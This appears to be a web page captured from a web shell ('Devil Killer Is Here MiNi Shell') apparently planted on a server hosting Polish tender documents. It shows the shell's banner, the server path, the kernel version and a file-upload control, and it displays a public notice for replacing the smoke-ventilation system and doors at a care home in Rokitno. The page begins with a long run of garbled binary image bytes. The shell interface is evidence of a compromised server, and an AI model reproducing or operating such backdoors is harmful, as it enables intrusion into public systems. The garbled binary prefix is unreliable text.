JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230710/0029726301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> WYMIANA SYSTEMU ODDYMIANIA KLATEK SCHODOWYCH ORAZ DRZWI SŁUŻĄCYCH do NAPOWIETRZANIA KLATEK SCHODOWYCH w DOMU POMOCY SPOŁECZNEJ w ROKITNIE NR 38 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ ROKITNO 38</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000308940</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rokitno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">administracja@dpsrokitno38.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.wrota.lubuskie.pl/dps_rokitno_38/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYMIANA SYSTEMU ODDYMIANIA KLATEK SCHODOWYCH ORAZ DRZWI SŁUŻĄCYCH do NAPOWIETRZANIA KLATEK SCHODOWYCH w DOMU POMOCY SPOŁECZNEJ w ROKITNIE NR 38 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2a4d4d99-1ee4-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00297263</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00050904/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wymiana systemu oddymiania klatek schodowych oraz drzwi służących do napowietrzania klatek schodowych w Domu Pomocy Społecznej w Rokitnie nr 38 u</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2a4d4d99-1ee4-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-2a4d4d99-1ee4-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>3.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a.	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub <br/>b.	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”). <br/><br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>5.Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: m.pinecka@dpsrokitno38.pl (nie dotyczy składania ofert).<br/>Zamawiający dopuszcza składanie wniosków o wyjaśnienie treści SWZ za pomocą poczty elektronicznej na adres m.pinecka@dpsrokitno38.pl lub poprzez http://ezamowienia.gov.pl.<br/>6.Odpowiedzi zostaną zamieszczone na stronie internetowej prowadzonego postępowania http://ezamowienia.gov.pl.<br/>Na stronie internetowej prowadzonego postępowania http://ezamowienia.gov.pl Zamawiający będzie udostępniał również inne informacje i dokumenty bezpośrednio związane przedmiotowym postępowaniem m.in. zmiany treści SWZ itp.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">6. Klauzula informacyjna<br/>Zgodnie z art. 13 ust. 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający – Dom Pomocy Społecznej - informuje, że:<br/>6.1. Administratorem danych osobowych jest Dyrektor Domu Pomocy Społecznej w Rokitnie nr 38<br/> Adres siedziby: Dom Pomocy Społecznej w Rokitnie nr 38 <br/> Adres e-mail: administracja@dpsrokitno38.pl<br/> Nr telefonu: 95 749 30 59<br/>6.2. Administrator wyznaczył Inspektora ochrony danych osobowych, z którym można kontaktować się na adres e-mail; m.pinecka@dpsrokitno38.pl lub pisemnie na adres: Dom Pomocy Społecznej w Rokitnie 38, 66-340 Przytoczna.<br/>6.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.1 lit.c RODO, w celu związanym z postępowaniem o udzielenie zamówienia publicznego Znak DPS/261/2/2023- ,,Wymiana systemu oddymiania klatek schodowych oraz drzwi służących do napowietrzania klatek schodowych w Domu Pomocy Społecznej w Rokitnie Nr 38” prowadzonym w trybie podstawowym zgodnie z art. 275 ust.1 ustawy Pzp.<br/>6.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust.1 ustawy Pzp.<br/>6.5. Pani /Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata , okres przechowywania obejmuje cały czas trwania umowy;<br/>6.6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>6.7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>6.8. Posiada Pan/Pani:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzanych danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust.2 RODO,<br/>•	prawo do wniesienia skargi do Prezesa Urzędu ochrony danych osobowych , gdy uzna <br/>Pani/Pan, ze przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>6.9. Nie przysługuje Pani/Panu<br/>•	w związku z art. 17 ust.3 lit. b,d lub e RODO prawo usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art.21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit.c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">261/2/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 131124,69 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest robota budowlana: Wymiana systemu oddymiania klatek schodowych oraz drzwi służących do napowietrzania klatek schodowych Domu Pomocy Społecznej w Rokitnie nr 38..<br/>2.	W zakres przedmiotu zamówienia wchodzi między innymi:<br/>2.1.	wymiana klap przeciwpożarowych:<br/>- z owiewkami szt. 1 o wymiarach 100cm x 190cm <br/>- z owiewkami i dyszą szt. 1 o wymiarach 130cm x100cm <br/>2.2. zjazd windy do poziomu zero- parteru.<br/>2.3. wymiana 4 szt. drzwi służących do napowietrzania klatek schodowych: <br/>	w zakres prac wchodzi demontaż istniejących klap i drzwi, zakup, dostawa i montaż nowych klap i drzwi wraz z oprzyrządowaniem zgodnym z dokumentacją projektową, <br/>	obecne klapy wentylacyjne o wymiarach 90 cm x 90 cm znajdują się w dachu budynku – dach kryty papą (przestrzeń pomiędzy stropem a dachem wypełniona żużlem),<br/>	do robót towarzyszących należy wykonanie robót wykończeniowych w obrębie dachu od strony zewnętrznej i wewnętrznej od strony sufitu,<br/>	wymiana urządzeń napowietrzających – drzwi – zgodnie z dokumentacją oraz wykonanie robót towarzyszących polegających na wykonaniu robót wykończeniowych,<br/>	montaż centrali sterującej z synchronizowanej z wszystkimi elementami SSP (systemu sygnalizacji pożaru),<br/>	zgodnie z projektem SSP musi być możliwe monitorowanie stanu klap (otwarta/zamknięta i stan pracy normalny/usterka) oraz ich sterowanie przez SSP wraz ze zautomatyzowanym powrotem do stanu normalnego, tak aby po każdym alarmie i jego skasowaniu nie było konieczności ręcznego otwierania/zamykania klap,<br/>	podczas realizacji projektu należy uwzględnić wymianę drzwi zewnętrznych, które służą do ewakuacji osób niepełnosprawnych na wózkach. Drzwi te będą otwierane ręcznie i będą stanowiły dodatkowy otwór napowietrzający - nie uwzględniony w obliczeniach.<br/>3. Szczegółowy zakres obowiązków wykonania przedmiotu zamówienia znajduje się we wzorze umowy, stanowiącym załącznik nr 9 do SWZ oraz w opisie przedmiotu zamówienia – dokumentacji projektowej dołączonej do ogłoszenia o zamówieniu.<br/>4. Z uwagi na fakt, że prace objęte niniejszą Umową będą prowadzone na czynnym obiekcie zamieszkiwanym przez osoby niepełnosprawne intelektualnie, Wykonawca zobowiązany jest do zachowania szczególnej ostrożności i zabezpieczenia strefy robót tak aby umożliwić korzystnie z obiektu z w niezbędnym zakresie.<br/>5. Wymagany przez Zamawiającego minimalny okres gwarancji na realizację przedmiotu zamówienia wynosi 5 lat (60 miesięcy). Szczegóły dotyczące rękojmi i gwarancji znajdują się w § 10 wzoru umowy ( zał. Nr 9 do SWZ).<br/>6. Klasyfikacja zamówienia wg Wspólnego Słownika Zamówień (CPV)<br/>•	42521000 – 4 - urządzenia do odprowadzania dymu <br/>•	44220000 – 8 - stolarka budowlana <br/>•	44221220 – 3 -drzwi przeciwpożarowe <br/>•	45210000 - 2 - roboty budowlane w zakresie budynków <br/>•	45421100 – 5 - instalowanie drzwi i okien, i podobnych elementów<br/>•	45410000- 4 - tynkowanie <br/>7. Wszystkie wskazane z nazwy materiały i przyjęte technologie użyte w dokumentacji (,,Projekt systemu oddymiania klatek schodowych’’) wskazanej w załączniku nr 9 do SWZ należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że Zamawiający dopuszcza składanie ofert równoważnych dla nazwanych materiałów i urządzeń, wymienionych w dokumentacji technicznej z zachowaniem ich wymogów w zakresie jakości.<br/>Przedstawione parametry przedmiotu zamówienia stanowią minimum techniczne i jakościowe oczekiwane przez Zamawiającego i będą stanowiły podstawę oceny ewentualnych materiałów równoważnych. Materiały przed wbudowaniem będą przedstawione Zamawiającemu do akceptacji.<br/>W przypadku przywołania w opisie przedmiotu zamówienia norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust.1-3 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42521000-4 - Urządzenia do odprowadzania dymu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44220000-8 - Stolarka budowlana</p> <p class="mb-0">44221220-3 - Drzwi przeciwpożarowe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny ofert i ich znaczenie: <br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i wagami wyrażonymi w procentach:<br/>1.1. Cena (C) – Oferowana cena ogółem brutto za całość przedmiotu zamówienia - waga 90%;<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 90 pkt, a punkty dla pozostałych ofert zostaną wyliczone według wzoru:<br/> <br/><br/>Cmin – cena brutto najniższa spośród nieodrzuconych ofert<br/>Cn – cena brutto badanej oferty<br/>90 – współczynnik wynikający z przyjętej wagi za dane kryterium<br/>gdzie 1%=1 pkt.<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>Maksymalna ilość punktów do uzyskania w kryterium - 90 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1. zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.3. sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.4. zdolności technicznej lub zawodowej<br/> Zamawiający wyznacza warunek w powyższym zakresie (pkt 2.4)<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>2.4.1	należycie zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert co najmniej jedną robotę budowlaną polegającą na<br/> –załącznik nr 5:<br/>	realizacji 1 układu wentylacyjnego z minimalną ilością klap p.poż - 2 szt.<br/>lub <br/>	realizacji 2 zadań polegających na montażu układu wentylacyjnego z jedną klapą ppoż. <br/><br/><br/> *Dla ww. wartości wykazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia wysłania ogłoszenia do niniejszego postępowania (tj. z dnia wysłania ogłoszenia o zamówieniu do BZP)<br/><br/><br/> 2.4.2. dysponuje osobami skierowanymi do realizacji zamówienia, tj.: osobami posiadającymi kwalifikacje Zgodnie z PKN-CEN/TS 54-14:2006 – Systemy sygnalizacji pożarowej — Część 14: Wytyczne planowania, projektowania, instalowania, odbioru, eksploatacji i konserwacji. Jako postanowienia ogólne Pkt. 4.8 brzmi „Osoby fizyczne lub prawne wykonujące jakiekolwiek prace, będące przedmiotem niniejszych wytycznych, powinny mieć odpowiednie kompetencje, doświadczenie i kwalifikacje”. A dalej szczegółowo w pkt. 7.7 (dot. etapu montażu), pkt. 8.6 (dot. uruchamiania instalacji) wskazano, iż powinny zajmować się, tym osoby posiadające odpowiednią wiedzę teoretyczną, praktyczną i odpowiednie kwalifikacje- osoba wyznaczona z imienia i nazwiska odpowiedzialna za sprawy techniczne wynikające z podłączenia urządzeń SSP- wymagane doświadczenie w zakresie wiedzy praktycznej i teoretycznej.<br/>2.4.3	dysponuje osobami skierowanymi do realizacji zamówienia, tj. osobami posiadającymi kwalifikacje w zakresie obsługi, konserwacji, remontów, montażu i kontrolno – pomiarowym, w rozumieniu z art. 54 ust. 6 ustawy z dnia 10 kwietnia 1997 r Prawo Energetyczne, którego aktem wykonawczym jest rozporządzenie ministra gospodarki, pracy i polityki społecznej z dnia 28 kwietnia 2003 r w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacje przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci, a w szczególności osobami posiadającymi uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie co najmniej SEP E1 dla instalacji do 1 kV. – dołączona do dokumentacji kserokopia uprawnień,<br/><br/>2.4.4	wyznaczy z imienia i nazwiska kierownika budowy (robót), który sporządzi plan bezpieczeństwa i ochrony zdrowia, poprowadzi dziennik budowy, będzie współpracował z wyznaczoną przez Zamawiającego osobą pełniąca funkcję nadzoru inwestorskiego, oraz będzie odpowiedzialny za inne nie wymienione sprawy wynikające z pełnienia tej funkcji.<br/><br/>3	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do Oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu 